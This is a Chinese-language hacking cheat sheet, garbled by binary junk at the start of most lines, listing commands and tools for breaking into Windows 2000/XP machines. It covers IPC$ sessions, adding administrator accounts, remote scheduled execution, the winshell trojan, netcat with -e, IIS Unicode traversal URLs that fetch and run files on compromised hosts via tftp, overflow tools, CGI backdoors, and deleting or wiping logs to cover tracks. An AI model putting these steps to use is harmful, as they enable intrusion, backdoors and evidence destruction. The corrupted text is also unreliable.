网管和黑客都必须知道的命令
�[Q�)l�JTs 常用的几条NET命令:
�T#�T�!a0� [t�,7�H�� (与远程主机建立空管连接) net use \\IP地址\ipc$ "" /use:""
�IX��-i��r qdzc"-g�H` (以管理员身份登录远程主机) net use \\IP地址\ipc$ "密码" /use:"Administrator"
_t���3n��< K47�W7zR�� (传送文件到远程主机WINNT目录下)copy 本机目录路径\程序 \\IP地址\admin$
{��V��8�v
�2T�iUo(MK (查看远程主机时间) net time \\IP地址
�wz�;IKdk[ I� lvjS^j� (定时启动某个程序) at \\IP地址 02:18 readme.exe
Zs)�HzOP)9 v2dC��na\� (查看共享) net view \\IP地址
entO"~*�EX _a��q3G9C_ (查看netbios工作组列表) nbtstat -A IP地址
�]*Zg(�YA� �N3i}>Q)B� (将远程主机C盘映射为自己的F盘) net use f: \\IP地址\c$ ""/user:"Administrator"
H��b� IRE� p�)d'��y�j (这两条把自己增加到管理员组): net user 用户名 密码 /add
H�7*/���� e<>(c7bF�� net localgroup Administrators 用户名 /add
mM1\���s>o B�x�ak[>�/ (断开连接) net use \\IP地址\ipc$ /delete
�p-r}zc9@ K�p8!^os� 扫尾:
L<*w�zl2Go w�F[^?�K ' del C:\winnt\system32\logfiles\*.*
3\G&fb|?}R 4��mPCAA7 del C:\winnt\ssytem32\config\*.evt
�4���Rp�2 O$LvH��v�! del C:\winnt\system32\dtclog\*.*
M+9G^o)��u 5�&\Q0SX(~ del C:\winnt\system32\*.log
T)�qD}h�l� �f_7a) 'V4 del C:\winnt\system32\*.txt
Oc�wD<Xy�� ) j_g��*�< del C:\winnt\*.txt
b�n�cIxxe� ��>y
�&9!G del C:\winnt\*.log
sJ{N�bN~`I xm6cn�\�e� 一、netsvc.exe
��`�c ^�2� �e@F�9�'z4 下面的命令分别是列出主机上的服务项目、查寻和远程启动主机的“时间任务”服务:
*O+�G�}_}� t[Xx��L�G* netsvc /list \\IP地址
inBBU[S�l� �oyi�EO�C netsvc schedule \\IP地址 /query
]=m
'�| 0} �@or&GcQ*� netsvc \\IP地址 schedule /start
{Ug?k<h7|� �5V�Dqx@�( 二、OpenTelnet.exe
"}�Of� �f �|x�3.r t� 远程启动主机的Telnet服务,并绑定端口到7878,例如:
�����4#�{i OEnJ�"�.&V OpenTelnet \\IP地址 用户名 密码 1 7878
�8A�~���5@ qCi6�kEr�� 然后就可以telnet到主机的7878端口,进入DOS方式下:
pdX%TrM+[: PF+v[�h�;, telnet IP地址 7878
G'�{$$+U^K �/p��t%*;H 三、winshell.exe
>
SU2Jw��� s_}T�-��%\ 一个非常小的木马(不到6K),telnet到主机的7878端口,输入密码winshell,当看到CMD>后,可打下面的命令:
}�SR}ET&�z �:U�Gc6�� p Path (查看winshell主程序的路径信息)
D�G}} �S�5 �L1
1�/XpR b reBoot (重新启动机器)
�-K9�bC3H "�T|%F D&[ d shutDown (关闭机器)
</�3��Shq� EbZRU65J}O s Shell (执行后你就会看到可爱的“C:\>”)
2"*��7H��S F:"<4hiA�" x eXit (退出本次登录会话,此命令并不终止winshell的运行)
B`3RyM"J�@ ��I0trHrX9 CMD>
http://.../srv.exe (通过http下载其他网站上的文件到运行winshell的机器上)
$@<qaR{t�\ .{%~4�$yu7 四、3389登陆器,GUI方式登录远程主机的
Bv�j-LT=�) 5-�3`@ �(/ 五、elsave.exe
�_C$JO��� �tkx1iBW= 事件日志清除工具
,i�Y/\
U'' (=c�R;\s< elsave -s \\IP地址 -l "application" -C
A�Q:�cim�` ;�O5���p>o elsave -s \\IP地址 -l "system" -C
P�#�H�|at� #��K:|@��d elsave -s \\IP地址 -l "security" -C
R�LBjl%Q>� }�JyWy�_Y� 执行后成功清除应用程序日志,系统日志,安全日志
a��"uO0LOb OoL�#8�R� 六、hbulot.exe
~?TG��SD@( �oac��e!si 开启win2kserver和winxp的3389服务
�Z".m�EF-b 1sK��KmtgH hbulot [/r]
�q|,cMP�S3 �'�#���K:e 使用/r表示安装完成后自动重起目标使设置生效。
mV�Fz[xI� :a3� ��+f5 七、nc.exe(netcat.exe)
%"Tn=fZIF� a'=C/� �s+ 一个很好的工具,一些脚本程序都要用到它,也可做溢出后的连接用。
k9H7�(nS{� e]�R`B}v�O 想要连接到某处: nc [-options] hostname port[s] [ports] ...
cz<8Kb/�XV <�>\s#�Jf/ 绑定端口等待连接: nc -l -p port [-options] [hostname] [port]
aVsA5t\�zi 3NRx��f��8 参数:
>�H�b>wlYR 3�"�;��Rw9 -e prog 程序重定向,一旦连接,就执行 [危险!!]
�P9h�]B��u �'ap<�]mf2 -g gateway source-routing hop point[s], up to 8
�dE�R#)bGj Vp{e1x�p�Y -G num source-routing pointer: 4, 8, 12, ...
"J:~Aa%��_ &<8Q/�m]5� -h 帮助信息
y+D� 3(Bsn �PAG.],�"D -i secs 延时的间隔
�b=[�gK|fu ��pm�$ZKM� -l 监听模式,用于入站连接
�`tZu~�
�n 6b1f�?��0 -n 指定数字的IP地址,不能用hostname
ds@X%L;�_� n�^<3E; a� -o file 记录16进制的传输
c"�qaU�L�Y
$�50rj�� -p port 本地端口号
lR�]�z8��& g%()8Qx�E1 -r 任意指定本地及远程端口
WmU5YZ(mAq 01v�7_*�'R -s addr 本地源地址
|GP��R3�%9 J[E_n;d�1 -u UDP模式
=@%;6`AVcp c�I}��qMc -v 详细输出——用两个-v可得到更详细的内容
VrL==aTYXs !]c]:�ed\C -w secs timeout的时间
w`Q"�m��x* �Gok8:��, -z 将输入输出关掉——用于扫描时
W�n;�B���~ 八、TFTPD32.EXE
}6/L5�j�:+ Hg8n�`a;R 把自己的电脑临时变为一台FTP服务器,让肉鸡来下载文件,tftp命令要在肉鸡上执行,通常要利用Unicode漏洞或telnet到肉鸡,例如:
b=:$~N@�Y fQ>=\*b9x^ http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c tftp -i 本机IP地址 get 文件名 c:\winnt\system32\文件名
>~O36q��^w sj;�8[Xy's 然后可以直接令文件运行:
]y&w��)-0� _?UW,�5=O� http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c+文件名
�YTBZkl��M Y|O�N��Cc� 九、prihack.exe是IIS的printer远程缓冲区溢出工具。idqover.exe是溢出idq的,选择“溢出后在一个端口监听”,然后用telnet连接它的监听端口,如果溢出成功,一连它的端口,绑定的命令马上执行。xploit.exe是一个图形界面的ida溢出,成功以后winxp下需要打winxp。
z;Pr�] *F� C�;m�7��~R 一○、ntis.exe、cmd.exe和cmdasp.asp是三个cgi-backdoor,exe要放到cgi-bin目录下,asp放到有ASP执行权限的目录。然后用IE浏览器连接。
ejq2]^O4�c ���f�1R&Q� 一、一 Xscan命令行运行参数说明:
|Ad1/>�8i� ]8,:�E ]`O 在检测过程中,按"[空格]"键可以查看各线程状态及扫描进度,按"q"键保存当前数据后提前退出程序,按"<ctrl+c>"强行关闭程序。
��*2�MM�� M6n�9>a�W4 1.命令格式: xscan -host <起始IP>[-<终止IP>] <检测项目> [其他选项]
�?O1:-vpZ� ||��|uTfrJ xscan -file <主机列表文件名> <检测项目> [其他选项]
U3�S�F'r�8 y'���sy]Q~ 其中<检测项目> 含义如下:
�;K[ G�]8� At�5:X�*vD -port : 检测常用服务的端口状态(可通过\dat\config.ini文件的"PORT-SCAN-OPTIONS\PORT-LIST"项定制待检测端口列表);
H��nvE\t9` s3��m]��rC -ftp : 检测FTP弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
�V\a�xOz!� �8+^?<FKa -ntpass : 检测NT-Server弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
F|�._'i+B! �StUiL>9T# -cgi : 检测CGI漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
a�Qa�x85�� �1](5wK-Z� -iis : 检测IIS漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
�nJ/�w�tw� D;bQ"P-m47 [其他选项] 含义如下:
muLt/.�EZ� >M�.?�qs�4 -v: 显示详细扫描进度
)"7hyW���5 JL~Q�E-pvD -p: 跳过Ping不通的主机
`!My�OI`qS @_0�g "�Ul -o: 跳过没有检测到开放端口的主机
AYH�fe#!� !Ju?RE�H�� -t <并发线程数量[,并发主机数量]>: 指定最大并发线程数量和并发主机数量, 默认数量为100,10
